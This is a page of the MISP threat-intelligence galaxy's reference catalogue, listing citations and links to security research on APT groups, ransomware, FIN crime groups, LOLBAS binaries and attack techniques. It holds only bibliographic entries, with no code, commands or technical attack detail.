https://www.amnesty.org/en/latest/research/2019/08/evolving-phishing-attacks-targeting-journalists-and-human-rights-defenders-from-the-middle-east-and-north-africa/

RSAC 2015 Abu Dhabi Stefano Maccaglia

Maccaglia, S. (2015, November 4). Evolving Threats: dissection of a CyberEspionage attack. Retrieved April 4, 2018.

The tag is: misp-galaxy:references="RSAC 2015 Abu Dhabi Stefano Maccaglia"

Table 13554. Table References

Links

https://paper.seebug.org/papers/APT/APT_CyberCriminal_Campagin/2015/2015.11.04_Evolving_Threats/cct-w08_evolving-threats-dissection-of-a-cyber-espionage-attack.pdf

Microsoft Iranian Threat Actor Trends November 2021

MSTIC. (2021, November 16). Evolving trends in Iranian threat actor activity – MSTIC presentation at CyberWarCon 2021. Retrieved January 12, 2023.

The tag is: misp-galaxy:references="Microsoft Iranian Threat Actor Trends November 2021"

Table 13555. Table References

Links

https://www.microsoft.com/en-us/security/blog/2021/11/16/evolving-trends-in-iranian-threat-actor-activity-mstic-presentation-at-cyberwarcon-2021

Palo Alto Unit 42 VBA Infostealer 2014

Vicky Ray and Rob Downs. (2014, October 29). Examining a VBA-Initiated Infostealer Campaign. Retrieved March 13, 2023.

The tag is: misp-galaxy:references="Palo Alto Unit 42 VBA Infostealer 2014"

Table 13556. Table References

Links

https://unit42.paloaltonetworks.com/examining-vba-initiated-infostealer-campaign/

Trend Micro Black Basta May 2022

Gonzalez, I., Chavez I., et al. (2022, May 9). Examining the Black Basta Ransomware’s Infection Routine. Retrieved March 7, 2023.

The tag is: misp-galaxy:references="Trend Micro Black Basta May 2022"

Table 13557. Table References

Links

https://www.trendmicro.com/en_us/research/22/e/examining-the-black-basta-ransomwares-infection-routine.html

Mandiant Glyer APT 2010

Glyer, C. (2010). Examples of Recent APT Persistence Mechanism. Retrieved December 18, 2020.

The tag is: misp-galaxy:references="Mandiant Glyer APT 2010"

Table 13558. Table References

Links

https://digital-forensics.sans.org/summit-archives/2010/35-glyer-apt-persistence-mechanisms.pdf

Excel.exe - LOLBAS Project

LOLBAS. (2019, July 19). Excel.exe. Retrieved December 4, 2023.

The tag is: misp-galaxy:references="Excel.exe - LOLBAS Project"

Table 13559. Table References

Links

https://lolbas-project.github.io/lolbas/OtherMSBinaries/Excel/

Microsoft Tim McMichael Exchange Mail Forwarding 2

McMichael, T. (2015, June 8). Exchange and Office 365 Mail Forwarding. Retrieved October 8, 2019.

The tag is: misp-galaxy:references="Microsoft Tim McMichael Exchange Mail Forwarding 2"

Table 13560. Table References

Links

https://blogs.technet.microsoft.com/timmcmic/2015/06/08/exchange-and-office-365-mail-forwarding-2/

DFIR Phosphorus November 2021

DFIR Report. (2021, November 15). Exchange Exploit Leads to Domain Wide Ransomware. Retrieved January 5, 2023.

The tag is: misp-galaxy:references="DFIR Phosphorus November 2021"

Table 13561. Table References

Links

https://thedfirreport.com/2021/11/15/exchange-exploit-leads-to-domain-wide-ransomware/

ExchangePowerShell Module

Microsoft. (2017, September 25). ExchangePowerShell. Retrieved June 10, 2022.

The tag is: misp-galaxy:references="ExchangePowerShell Module"

Table 13562. Table References

Links

https://docs.microsoft.com/en-us/powershell/module/exchange/?view=exchange-ps#mailboxes

ESET Exchange Mar 2021

Faou, M., Tartare, M., Dupuy, T. (2021, March 10). Exchange servers under siege from at least 10 APT groups. Retrieved May 21, 2021.

The tag is: misp-galaxy:references="ESET Exchange Mar 2021"

Table 13563. Table References

Links

https://www.welivesecurity.com/2021/03/10/exchange-servers-under-siege-10-apt-groups/

Executable Installers are Vulnerable

Stefan Kanthak. (2015, December 8). Executable installers are vulnerable^WEVIL (case 7): 7z*.exe allows remote code execution with escalation of privilege. Retrieved December 4, 2014.

The tag is: misp-galaxy:references="Executable Installers are Vulnerable"

Table 13564. Table References

Links

https://seclists.org/fulldisclosure/2015/Dec/34

Seclists Kanthak 7zip Installer

Kanthak, S. (2015, December 8). Executable installers are vulnerable^WEVIL (case 7): 7z*.exe allows remote code execution with escalation of privilege. Retrieved March 10, 2017.

The tag is: misp-galaxy:references="Seclists Kanthak 7zip Installer"

Table 13565. Table References

Links

http://seclists.org/fulldisclosure/2015/Dec/34

Redxorblue Remote Template Injection

Hawkins, J. (2018, July 18). Executing Macros From a DOCX With Remote Template Injection. Retrieved October 12, 2018.

The tag is: misp-galaxy:references="Redxorblue Remote Template Injection"

Table 13566. Table References

Links

http://blog.redxorblue.com/2018/07/executing-macros-from-docx-with-remote.html

Microsoft PSfromCsharp APR 2014

Babinec, K. (2014, April 28). Executing PowerShell scripts from C#. Retrieved April 22, 2019.

The tag is: misp-galaxy:references="Microsoft PSfromCsharp APR 2014"

Table 13567. Table References

Links

https://blogs.msdn.microsoft.com/kebab/2014/04/28/executing-powershell-scripts-from-c/

PAM Creds

Fernández, J. M. (2018, June 27). Exfiltrating credentials via PAM backdoors & DNS requests. Retrieved June 26, 2020.

The tag is: misp-galaxy:references="PAM Creds"

Table 13568. Table References

Links

https://x-c3ll.github.io/posts/PAM-backdoor-DNS/

Microsoft Expand Utility

Microsoft. (2017, October 15). Expand. Retrieved February 19, 2019.

The tag is: misp-galaxy:references="Microsoft Expand Utility"

Table 13569. Table References

Links

https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/expand

LOLBAS Expand

LOLBAS. (n.d.). Expand.exe. Retrieved February 19, 2019.

The tag is: misp-galaxy:references="LOLBAS Expand"

Table 13570. Table References

Links

https://lolbas-project.github.io/lolbas/Binaries/Expand/

Mandiant CVE-2023-3519 Exploitation

James Nugent, Foti Castelan, Doug Bienstock, Justin Moore, Josh Murchie. (2023, July 21). Exploitation of Citrix Zero-Day by Possible Espionage Actors (CVE-2023-3519). Retrieved July 24, 2023.

The tag is: misp-galaxy:references="Mandiant CVE-2023-3519 Exploitation"

Table 13571. Table References

Links

https://www.mandiant.com/resources/blog/citrix-zero-day-espionage

Exploit Database

Offensive Security. (n.d.). Exploit Database. Retrieved October 15, 2020.

The tag is: misp-galaxy:references="Exploit Database"

Table 13572. Table References

Links

https://www.exploit-db.com/

Rhino Labs Cloud Image Backdoor Technique Sept 2019

Rhino Labs. (2019, August). Exploiting AWS ECR and ECS with the Cloud Container Attack Tool (CCAT). Retrieved September 12, 2019.

The tag is: misp-galaxy:references="Rhino Labs Cloud Image Backdoor Technique Sept 2019"

Table 13573. Table References

Links

https://rhinosecuritylabs.com/aws/cloud-container-attack-tool/

Azure AD PTA Vulnerabilities

Dr. Nestori Syynimaa. (2022, September 20). Exploiting Azure AD PTA vulnerabilities: Creating backdoor and harvesting credentials. Retrieved September 28, 2022.

The tag is: misp-galaxy:references="Azure AD PTA Vulnerabilities"

Table 13574. Table References

Links

https://o365blog.com/post/pta/

Exploiting Smartphone USB

Zhaohui Wang & Angelos Stavrou. (n.d.). Exploiting Smart-Phone USB Connectivity For Fun And Profit. Retrieved May 25, 2022.

The tag is: misp-galaxy:references="Exploiting Smartphone USB"

Table 13575. Table References

Links

https://citeseerx.ist.psu.edu/viewdoc/download?doi=10.1.1.226.3427&rep=rep1&type=pdf

versprite xpc vpn

VerSprite. (2018, January 24). Exploiting VyprVPN for MacOS. Retrieved April 20, 2022.

The tag is: misp-galaxy:references="versprite xpc vpn"

Table 13576. Table References

Links

https://versprite.com/blog/exploiting-vyprvpn-for-macos/

Explorer.exe - LOLBAS Project

LOLBAS. (2020, June 24). Explorer.exe. Retrieved December 4, 2023.

The tag is: misp-galaxy:references="Explorer.exe - LOLBAS Project"

Table 13577. Table References

Links

https://lolbas-project.github.io/lolbas/Binaries/Explorer/

Trend Micro Emotet Jan 2019

Trend Micro. (2019, January 16). Exploring Emotet’s Activities. Retrieved March 25, 2019.

The tag is: misp-galaxy:references="Trend Micro Emotet Jan 2019"

Table 13578. Table References

Links

https://documents.trendmicro.com/assets/white_papers/ExploringEmotetsActivities_Final.pdf

SecurityTrails Google Hacking

Borges, E. (2019, March 5). Exploring Google Hacking Techniques. Retrieved October 20, 2020.

The tag is: misp-galaxy:references="SecurityTrails Google Hacking"

Table 13579. Table References

Links

https://securitytrails.com/blog/google-hacking-techniques

Medium SSL Cert

Jain, M. (2019, September 16). Export & Download — SSL Certificate from Server (Site URL). Retrieved October 20, 2020.

The tag is: misp-galaxy:references="Medium SSL Cert"

Table 13580. Table References

Links

https://medium.com/@menakajain/export-download-ssl-certificate-from-server-site-url-bcfc41ea46a2

Google EXOTIC LILY March 2022

Stolyarov, V. (2022, March 17). Exposing initial access broker with ties to Conti. Retrieved August 18, 2022.

The tag is: misp-galaxy:references="Google EXOTIC LILY March 2022"

Table 13581. Table References

Links

https://blog.google/threat-analysis-group/exposing-initial-access-broker-ties-conti/

Microsoft POLONIUM June 2022

Microsoft. (2022, June 2). Exposing POLONIUM activity and infrastructure targeting Israeli organizations. Retrieved July 1, 2022.

The tag is: misp-galaxy:references="Microsoft POLONIUM June 2022"

Table 13582. Table References

Links

https://www.microsoft.com/security/blog/2022/06/02/exposing-polonium-activity-and-infrastructure-targeting-israeli-organizations/

External to DA, the OS X Way

Alex Rymdeko-Harvey, Steve Borosh. (2016, May 14). External to DA, the OS X Way. Retrieved July 3, 2017.

The tag is: misp-galaxy:references="External to DA, the OS X Way"

Table 13583. Table References

Links

http://www.slideshare.net/StephanBorosh/external-to-da-the-os-x-way

Extexport.exe - LOLBAS Project

LOLBAS. (2018, May 25). Extexport.exe. Retrieved December 4, 2023.

The tag is: misp-galaxy:references="Extexport.exe - LOLBAS Project"

Table 13584. Table References

Links

https://lolbas-project.github.io/lolbas/Binaries/Extexport/

Extrac32.exe - LOLBAS Project

LOLBAS. (2018, May 25). Extrac32.exe. Retrieved December 4, 2023.

The tag is: misp-galaxy:references="Extrac32.exe - LOLBAS Project"

Table 13585. Table References

Links

https://lolbas-project.github.io/lolbas/Binaries/Extrac32/

Journey into IR ZeroAccess NTFS EA

Harrell, C. (2012, December 11). Extracting ZeroAccess from NTFS Extended Attributes. Retrieved June 3, 2016.

The tag is: misp-galaxy:references="Journey into IR ZeroAccess NTFS EA"

Table 13586. Table References

Links

http://journeyintoir.blogspot.com/2012/12/extracting-zeroaccess-from-ntfs.html

Bizeul 2014

Bizeul, D., Fontarensky, I., Mouchoux, R., Perigaud, F., Pernet, C. (2014, July 11). Eye of the Tiger. Retrieved September 29, 2015.

The tag is: misp-galaxy:references="Bizeul 2014"

Table 13587. Table References

Links

https://airbus-cyber-security.com/the-eye-of-the-tiger/

ThreatPost Social Media Phishing

O’Donnell, L. (2020, October 20). Facebook: A Top Launching Pad For Phishing Attacks. Retrieved October 20, 2020.

The tag is: misp-galaxy:references="ThreatPost Social Media Phishing"

Table 13588. Table References

Links

https://threatpost.com/facebook-launching-pad-phishing-attacks/160351/

SentinelLabs reversing run-only applescripts 2021

Phil Stokes. (2021, January 11). FADE DEAD | Adventures in Reversing Malicious Run-Only AppleScripts. Retrieved September 29, 2022.

The tag is: misp-galaxy:references="SentinelLabs reversing run-only applescripts 2021"

Table 13589. Table References

Links

https://www.sentinelone.com/labs/fade-dead-adventures-in-reversing-malicious-run-only-applescripts/

Sentinel Labs

Phil Stokes. (2021, January 11). FADE DEAD | Adventures in Reversing Malicious Run-Only AppleScripts. Retrieved September 30, 2022.

The tag is: misp-galaxy:references="Sentinel Labs"

Table 13590. Table References

Links

https://www.sentinelone.com/labs/fade-dead-adventures-in-reversing-malicious-run-only-applescripts/

ESET OceanLotus Mar 2019

Dumont, R. (2019, March 20). Fake or Fake: Keeping up with OceanLotus decoys. Retrieved April 1, 2019.

The tag is: misp-galaxy:references="ESET OceanLotus Mar 2019"

Table 13591. Table References

Links

https://www.welivesecurity.com/2019/03/20/fake-or-fake-keeping-up-with-oceanlotus-decoys/

ZScaler BitB 2020

ZScaler. (2020, February 11). Fake Sites Stealing Steam Credentials. Retrieved March 8, 2023.

The tag is: misp-galaxy:references="ZScaler BitB 2020"

Table 13592. Table References

Links

https://www.zscaler.com/blogs/security-research/fake-sites-stealing-steam-credentials

FalconFeedsio Tweet October 9 2023

FalconFeedsio. (2023, October 9). FalconFeedsio Tweet October 9 2023. Retrieved October 10, 2023.

The tag is: misp-galaxy:references="FalconFeedsio Tweet October 9 2023"

Table 13593. Table References

Links

https://twitter.com/FalconFeedsio/status/1711251161289003465

FalconFeedsio Tweet September 28 2023

FalconFeedsio. (2023, September 28). FalconFeedsio Tweet September 28 2023. Retrieved October 10, 2023.

The tag is: misp-galaxy:references="FalconFeedsio Tweet September 28 2023"

Table 13594. Table References

Links

https://twitter.com/FalconFeedsio/status/1707330146842169831

falconoverwatch_blackcat_attack

Falcon OverWatch Team. (2022, March 23). Falcon OverWatch Threat Hunting Contributes to Seamless Protection Against Novel BlackCat Attack. Retrieved May 5, 2022.

The tag is: misp-galaxy:references="falconoverwatch_blackcat_attack"

Table 13595. Table References

Links

https://www.crowdstrike.com/blog/falcon-overwatch-contributes-to-blackcat-protection/

CitizenLab Tropic Trooper Aug 2018

Alexander, G., et al. (2018, August 8). Familiar Feeling: A Malware Campaign Targeting the Tibetan Diaspora Resurfaces. Retrieved June 17, 2019.

The tag is: misp-galaxy:references="CitizenLab Tropic Trooper Aug 2018"

Table 13596. Table References

Links

https://citizenlab.ca/2018/08/familiar-feeling-a-malware-campaign-targeting-the-tibetan-diaspora-resurfaces/

CISA AA20-239A BeagleBoyz August 2020

DHS/CISA. (2020, August 26). FASTCash 2.0: North Korea’s BeagleBoyz Robbing Banks. Retrieved September 29, 2021.

The tag is: misp-galaxy:references="CISA AA20-239A BeagleBoyz August 2020"

Table 13597. Table References

Links

https://us-cert.cisa.gov/ncas/alerts/aa20-239a

Fast Flux - Welivesecurity

Albors, Josep. (2017, January 12). Fast Flux networks: What are they and how do they work? Retrieved March 11, 2020.

The tag is: misp-galaxy:references="Fast Flux - Welivesecurity"

Table 13598. Table References

Links

https://www.welivesecurity.com/2017/01/12/fast-flux-networks-work/

MehtaFastFluxPt1

Mehta, L. (2014, December 17). Fast Flux Networks Working and Detection, Part 1. Retrieved March 6, 2017.

The tag is: misp-galaxy:references="MehtaFastFluxPt1"

Table 13599. Table References

Links

https://resources.infosecinstitute.com/fast-flux-networks-working-detection-part-1/#gref

MehtaFastFluxPt2

Mehta, L. (2014, December 23). Fast Flux Networks Working and Detection, Part 2. Retrieved March 6, 2017.

The tag is: misp-galaxy:references="MehtaFastFluxPt2"

Table 13600. Table References

Links

https://resources.infosecinstitute.com/fast-flux-networks-working-detection-part-2/#gref

FBI-BEC

FBI. (2022). FBI 2022 Congressional Report on BEC and Real Estate Wire Fraud. Retrieved August 18, 2023.

The tag is: misp-galaxy:references="FBI-BEC"

Table 13601. Table References

Links

https://www.fbi.gov/file-repository/fy-2022-fbi-congressional-report-business-email-compromise-and-real-estate-wire-fraud-111422.pdf/view

FBI Flash FIN7 USB

The Record. (2022, January 7). FBI: FIN7 hackers target US companies with BadUSB devices to install ransomware. Retrieved January 14, 2022.

The tag is: misp-galaxy:references="FBI Flash FIN7 USB"

Table 13602. Table References

Links

https://therecord.media/fbi-fin7-hackers-target-us-companies-with-badusb-devices-to-install-ransomware/

FBI Lazarus Stake.com Theft Attribution September 2023

FBI National Press Office. (2023, September 6). FBI Identifies Lazarus Group Cyber Actors as Responsible for Theft of $41 Million from Stake.com. Retrieved September 13, 2023.

The tag is: misp-galaxy:references="FBI Lazarus Stake.com Theft Attribution September 2023"

Table 13603. Table References

Links

https://www.fbi.gov/news/press-releases/fbi-identifies-lazarus-group-cyber-actors-as-responsible-for-theft-of-41-million-from-stakecom

Hakobyan 2009

Hakobyan, A. (2009, January 8). FDump - Dumping File Sectors Directly from Disk using Logical Offsets. Retrieved November 12, 2014.

The tag is: misp-galaxy:references="Hakobyan 2009"

Table 13604. Table References

Links

http://www.codeproject.com/Articles/32169/FDump-Dumping-File-Sectors-Directly-from-Disk-usin

Google Federating GC

Google. (n.d.). Federating Google Cloud with Active Directory. Retrieved March 13, 2020.

The tag is: misp-galaxy:references="Google Federating GC"

Table 13605. Table References

Links

https://cloud.google.com/solutions/federating-gcp-with-active-directory-introduction

Kaspersky Ferocious Kitten Jun 2021

GReAT. (2021, June 16). Ferocious Kitten: 6 Years of Covert Surveillance in Iran. Retrieved September 22, 2021.

The tag is: misp-galaxy:references="Kaspersky Ferocious Kitten Jun 2021"

Table 13606. Table References

Links

https://securelist.com/ferocious-kitten-6-years-of-covert-surveillance-in-iran/102806/

Fidelis njRAT June 2013

Fidelis Cybersecurity. (2013, June 28). Fidelis Threat Advisory #1009: "njRAT" Uncovered. Retrieved June 4, 2019.

The tag is: misp-galaxy:references="Fidelis njRAT June 2013"

Table 13607. Table References

Links

https://www.threatminer.org/_reports/2013/fta-1009---njrat-uncovered-1.pdf

Fidelis INOCNATION

Fidelis Cybersecurity. (2015, December 16). Fidelis Threat Advisory #1020: Dissecting the Malware Involved in the INOCNATION Campaign. Retrieved March 24, 2016.

The tag is: misp-galaxy:references="Fidelis INOCNATION"

Table 13608. Table References

Links

https://www.fidelissecurity.com/sites/default/files/FTA_1020_Fidelis_Inocnation_FINAL_0.pdf

Securelist fileless attacks Feb 2017

Kaspersky Lab’s Global Research and Analysis Team. (2017, February 8). Fileless attacks against enterprise networks. Retrieved February 8, 2017.

The tag is: misp-galaxy:references="Securelist fileless attacks Feb 2017"

Table 13609. Table References

Links

https://securelist.com/fileless-attacks-against-enterprise-networks/77403/

Airbus Security Kovter Analysis

Dove, A. (2016, March 23). Fileless Malware – A Behavioural Analysis Of Kovter Persistence. Retrieved December 5, 2017.

The tag is: misp-galaxy:references="Airbus Security Kovter Analysis"

Table 13610. Table References

Links

https://airbus-cyber-security.com/fileless-malware-behavioural-analysis-kovter-persistence/

Microsoft Fileless

Microsoft. (2023, February 6). Fileless threats. Retrieved March 23, 2023.

The tag is: misp-galaxy:references="Microsoft Fileless"

Table 13611. Table References

Links

https://learn.microsoft.com/microsoft-365/security/intelligence/fileless-threats

enigma0x3 Fileless UAC Bypass

Nelson, M. (2016, August 15). "Fileless" UAC Bypass using eventvwr.exe and Registry Hijacking. Retrieved December 27, 2016.

The tag is: misp-galaxy:references="enigma0x3 Fileless UAC Bypass"

Table 13612. Table References

Links

https://enigma0x3.net/2016/08/15/fileless-uac-bypass-using-eventvwr-exe-and-registry-hijacking/

enigma0x3 sdclt bypass

Nelson, M. (2017, March 17). "Fileless" UAC Bypass Using sdclt.exe. Retrieved May 25, 2017.

The tag is: misp-galaxy:references="enigma0x3 sdclt bypass"

Table 13613. Table References

Links

https://enigma0x3.net/2017/03/17/fileless-uac-bypass-using-sdclt-exe/

Microsoft File Mgmt

Microsoft. (2018, May 31). File Management (Local File Systems). Retrieved September 28, 2021.

The tag is: misp-galaxy:references="Microsoft File Mgmt"

Table 13614. Table References

Links

https://docs.microsoft.com/en-us/windows/win32/fileio/file-management

Microsoft File Streams

Microsoft. (n.d.). File Streams. Retrieved December 2, 2014.

The tag is: misp-galaxy:references="Microsoft File Streams"

Table 13615. Table References

Links

http://msdn.microsoft.com/en-us/library/aa364404

file_upload_attacks_pt2

YesWeRHackers. (2021, June 16). File Upload Attacks (Part 2). Retrieved August 23, 2022.

The tag is: misp-galaxy:references="file_upload_attacks_pt2"

Table 13616. Table References

Links

https://blog.yeswehack.com/yeswerhackers/file-upload-attacks-part-2/

Microsoft GPO Security Filtering

Microsoft. (2018, May 30). Filtering the Scope of a GPO. Retrieved March 13, 2019.

The tag is: misp-galaxy:references="Microsoft GPO Security Filtering"

Table 13617. Table References

Links

https://docs.microsoft.com/en-us/previous-versions/windows/desktop/Policy/filtering-the-scope-of-a-gpo

FireEye FIN10 June 2017

FireEye iSIGHT Intelligence. (2017, June 16). FIN10: Anatomy of a Cyber Extortion Operation. Retrieved June 25, 2017.

The tag is: misp-galaxy:references="FireEye FIN10 June 2017"

Table 13618. Table References

Links

https://www2.fireeye.com/rs/848-DID-242/images/rpt-fin10.pdf

Mandiant FIN12 Group Profile October 07 2021

Joshua Shilko, Zach Riddle, Jennifer Brooks, Genevieve Stark, Adam Brunner, Kimberly Goody, Jeremy Kennelly. (2021, October 7). FIN12 Group Profile. Retrieved September 22, 2023.

The tag is: misp-galaxy:references="Mandiant FIN12 Group Profile October 07 2021"

Table 13619. Table References

Links

https://www.mandiant.com/sites/default/files/2021-10/fin12-group-profile.pdf

Mandiant FIN12 Oct 2021

Shilko, J., et al. (2021, October 7). FIN12: The Prolific Ransomware Intrusion Threat Actor That Has Aggressively Pursued Healthcare Targets. Retrieved June 15, 2023.

The tag is: misp-galaxy:references="Mandiant FIN12 Oct 2021"

Table 13620. Table References

Links

https://www.mandiant.com/sites/default/files/2021-10/fin12-group-profile.pdf

CERTFR-2023-CTI-007

CERT-FR. (2023, September 18). FIN12: Un Groupe Cybercriminel aux Multiples Rançongiciel. Retrieved September 21, 2023.

The tag is: misp-galaxy:references="CERTFR-2023-CTI-007"

Table 13621. Table References

Links

https://www.cert.ssi.gouv.fr/uploads/CERTFR-2023-CTI-007.pdf

Mandiant FIN13 Aug 2022

Ta, V., et al. (2022, August 8). FIN13: A Cybercriminal Threat Actor Focused on Mexico. Retrieved February 9, 2023.

The tag is: misp-galaxy:references="Mandiant FIN13 Aug 2022"

Table 13622. Table References

Links

https://www.mandiant.com/resources/blog/fin13-cybercriminal-mexico

FireEye FIN4 Stealing Insider NOV 2014

Dennesen, K. et al. (2014, November 30). FIN4: Stealing Insider Information for an Advantage in Stock Trading?. Retrieved December 17, 2018.

The tag is: misp-galaxy:references="FireEye FIN4 Stealing Insider NOV 2014"

Table 13623. Table References

Links

https://www.fireeye.com/blog/threat-research/2014/11/fin4_stealing_insid.html

Visa FIN6 Feb 2019

Visa Public. (2019, February). FIN6 Cybercrime Group Expands Threat to eCommerce Merchants. Retrieved September 16, 2019.

The tag is: misp-galaxy:references="Visa FIN6 Feb 2019"

Table 13624. Table References

Links

https://usa.visa.com/dam/VCOM/global/support-legal/documents/fin6-cybercrime-group-expands-threat-To-ecommerce-merchants.pdf

SentinelOne FrameworkPOS September 2019

Kremez, V. (2019, September 19). FIN6 “FrameworkPOS”: Point-of-Sale Malware Analysis & Internals. Retrieved September 8, 2020.

The tag is: misp-galaxy:references="SentinelOne FrameworkPOS September 2019"

Table 13625. Table References

Links

https://labs.sentinelone.com/fin6-frameworkpos-point-of-sale-malware-analysis-internals-2/

SecureList Griffon May 2019

Namestnikov, Y. and Aime, F. (2019, May 8). FIN7.5: the infamous cybercrime rig “FIN7” continues its activities. Retrieved October 11, 2019.

The tag is: misp-galaxy:references="SecureList Griffon May 2019"

Table 13626. Table References

Links

https://securelist.com/fin7-5-the-infamous-cybercrime-rig-fin7-continues-its-activities/90703/

Threatpost Lizar May 2021

Seals, T. (2021, May 14). FIN7 Backdoor Masquerades as Ethical Hacking Tool. Retrieved February 2, 2022.

The tag is: misp-galaxy:references="Threatpost Lizar May 2021"

Table 13627. Table References

Links

https://threatpost.com/fin7-backdoor-ethical-hacking-tool/166194/

FireEye FIN7 April 2017

Carr, N., et al. (2017, April 24). FIN7 Evolution and the Phishing LNK. Retrieved April 24, 2017.

The tag is: misp-galaxy:references="FireEye FIN7 April 2017"

Table 13628. Table References

Links

https://www.fireeye.com/blog/threat-research/2017/04/fin7-phishing-lnk.html

Mandiant FIN7 Apr 2022

Abdo, B., et al. (2022, April 4). FIN7 Power Hour: Adversary Archaeology and the Evolution of FIN7. Retrieved April 5, 2022.

The tag is: misp-galaxy:references="Mandiant FIN7 Apr 2022"

Table 13629. Table References

Links

https://www.mandiant.com/resources/evolution-of-fin7

Gemini FIN7 Oct 2021

Gemini Advisory. (2021, October 21). FIN7 Recruits Talent For Push Into Ransomware. Retrieved February 2, 2022.

The tag is: misp-galaxy:references="Gemini FIN7 Oct 2021"

Table 13630. Table References

Links

https://geminiadvisory.io/fin7-ransomware-bastion-secure/

Flashpoint FIN 7 March 2019

Platt, J. and Reeves, J. (2019, March). FIN7 Revisited: Inside Astra Panel and SQLRat Malware. Retrieved June 18, 2019.

The tag is: misp-galaxy:references="Flashpoint FIN 7 March 2019"

Table 13631. Table References

Links

https://www.flashpoint-intel.com/blog/fin7-revisited-inside-astra-panel-and-sqlrat-malware/

FireEye FIN7 March 2017

Miller, S., et al. (2017, March 7). FIN7 Spear Phishing Campaign Targets Personnel Involved in SEC Filings. Retrieved March 8, 2017.

The tag is: misp-galaxy:references="FireEye FIN7 March 2017"

Table 13632. Table References

Links

https://web.archive.org/web/20180808125108/https:/www.fireeye.com/blog/threat-research/2017/03/fin7_spear_phishing.html

Morphisec FIN7 June 2017

Gorelik, M. (2017, June 9). FIN7 Takes Another Bite at the Restaurant Industry. Retrieved July 13, 2017.

The tag is: misp-galaxy:references="Morphisec FIN7 June 2017"

Table 13633. Table References

Links

http://blog.morphisec.com/fin7-attacks-restaurant-industry

CyberScoop FIN7 Oct 2017

Waterman, S. (2017, October 16). Fin7 weaponization of DDE is just their latest slick move, say researchers. Retrieved November 21, 2017.

The tag is: misp-galaxy:references="CyberScoop FIN7 Oct 2017"

Table 13634. Table References

Links

https://www.cyberscoop.com/fin7-dde-morphisec-fileless-malware/

BitDefender BADHATCH Mar 2021

Vrabie, V., et al. (2021, March 10). FIN8 Returns with Improved BADHATCH Toolkit. Retrieved September 8, 2021.

The tag is: misp-galaxy:references="BitDefender BADHATCH Mar 2021"

Table 13635. Table References

Links

https://www.bitdefender.com/files/News/CaseStudies/study/394/Bitdefender-PR-Whitepaper-BADHATCH-creat5237-en-EN.pdf

Bitdefender FIN8 BADHATCH Report

Bitdefender. (2021, March 10). FIN8 Returns with Improved BADHATCH Toolkit. Retrieved October 30, 2023.

The tag is: misp-galaxy:references="Bitdefender FIN8 BADHATCH Report"

Table 13636. Table References

Links

https://www.bitdefender.com/files/News/CaseStudies/study/394/Bitdefender-PR-Whitepaper-BADHATCH-creat5237-en-EN.pdf

Bitdefender Sardonic Aug 2021

Budaca, E., et al. (2021, August 25). FIN8 Threat Actor Goes Agile with New Sardonic Backdoor. Retrieved August 9, 2023.

The tag is: misp-galaxy:references="Bitdefender Sardonic Aug 2021"

Table 13637. Table References

Links

https://www.bitdefender.com/files/News/CaseStudies/study/401/Bitdefender-PR-Whitepaper-FIN8-creat5619-en-EN.pdf

Symantec FIN8 Jul 2023

Symantec Threat Hunter Team. (2023, July 18). FIN8 Uses Revamped Sardonic Backdoor to Deliver Noberus Ransomware. Retrieved August 9, 2023.

The tag is: misp-galaxy:references="Symantec FIN8 Jul 2023"

Table 13638. Table References

Links

https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/syssphinx-fin8-backdoor

DiginotarCompromise

Fisher, D. (2012, October 31). Final Report on DigiNotar Hack Shows Total Compromise of CA Servers. Retrieved March 6, 2017.

The tag is: misp-galaxy:references="DiginotarCompromise"

Table 13639. Table References

Links

https://threatpost.com/final-report-diginotar-hack-shows-total-compromise-ca-servers-103112/77170/

FireEye Financial Actors Moving into OT

Brubaker, N., Zafra, D. K., Lunden, K., Proska, K., Hildebrandt, C. (2020, July 15). Financially Motivated Actors Are Expanding Access Into OT: Analysis of Kill Lists That Include OT Processes Used With Seven Malware Families. Retrieved February 15, 2021.

The tag is: misp-galaxy:references="FireEye Financial Actors Moving into OT"

Table 13640. Table References

Links

https://www.fireeye.com/blog/threat-research/2020/07/financially-motivated-actors-are-expanding-access-into-ot.html

MITRECND FindAPIHash

Jason (jxb5151). (2021, January 28). findapihash.py. Retrieved August 22, 2022.

The tag is: misp-galaxy:references="MITRECND FindAPIHash"

Table 13641. Table References

Links

https://github.com/MITRECND/malchive/blob/main/malchive/utilities/findapihash.py

Expel IO Evil in AWS

A. Randazzo, B. Manahan and S. Lipton. (2020, April 28). Finding Evil in AWS. Retrieved June 25, 2020.

The tag is: misp-galaxy:references="Expel IO Evil in AWS"

Table 13642. Table References

Links

https://expel.io/blog/finding-evil-in-aws/

SANS Decrypting SSL

Butler, M. (2013, November). Finding Hidden Threats by Decrypting SSL. Retrieved April 5, 2016.

The tag is: misp-galaxy:references="SANS Decrypting SSL"

Table 13643. Table References

Links

http://www.sans.org/reading-room/whitepapers/analyst/finding-hidden-threats-decrypting-ssl-34840

Operation Emmental

Sancho, D., Hacquebord, F., Link, R. (2014, July 22). Finding Holes Operation Emmental. Retrieved February 9, 2016.

The tag is: misp-galaxy:references="Operation Emmental"

Table 13644. Table References

Links

http://www.trendmicro.com/cloud-content/us/pdfs/security-intelligence/white-papers/wp-finding-holes-operation-emmental.pdf

ADSecurity Finding Passwords in SYSVOL

Sean Metcalf. (2015, December 28). Finding Passwords in SYSVOL & Exploiting Group Policy Preferences. Retrieved February 17, 2020.

The tag is: misp-galaxy:references="ADSecurity Finding Passwords in SYSVOL"

Table 13645. Table References

Links

https://adsecurity.org/?p=2288

Findstr.exe - LOLBAS Project

LOLBAS. (2018, May 25). Findstr.exe. Retrieved December 4, 2023.

The tag is: misp-galaxy:references="Findstr.exe - LOLBAS Project"

Table 13646. Table References

Links

https://lolbas-project.github.io/lolbas/Binaries/Findstr/

FinFisher Citation

FinFisher. (n.d.). Retrieved December 20, 2017.

The tag is: misp-galaxy:references="FinFisher Citation"

Table 13647. Table References

Links

http://www.finfisher.com/FinFisher/index.html

Microsoft FinFisher March 2018

Allievi, A., Flori, E. (2018, March 01). FinFisher exposed: A researcher’s tale of defeating traps, tricks, and complex virtual machines. Retrieved July 9, 2018.

The tag is: misp-galaxy:references="Microsoft FinFisher March 2018"

Table 13648. Table References

Links

https://cloudblogs.microsoft.com/microsoftsecure/2018/03/01/finfisher-exposed-a-researchers-tale-of-defeating-traps-tricks-and-complex-virtual-machines/

FinFisher exposed

Microsoft Defender Security Research Team. (2018, March 1). FinFisher exposed: A researcher’s tale of defeating traps, tricks, and complex virtual machines. Retrieved January 27, 2022.

The tag is: misp-galaxy:references="FinFisher exposed"

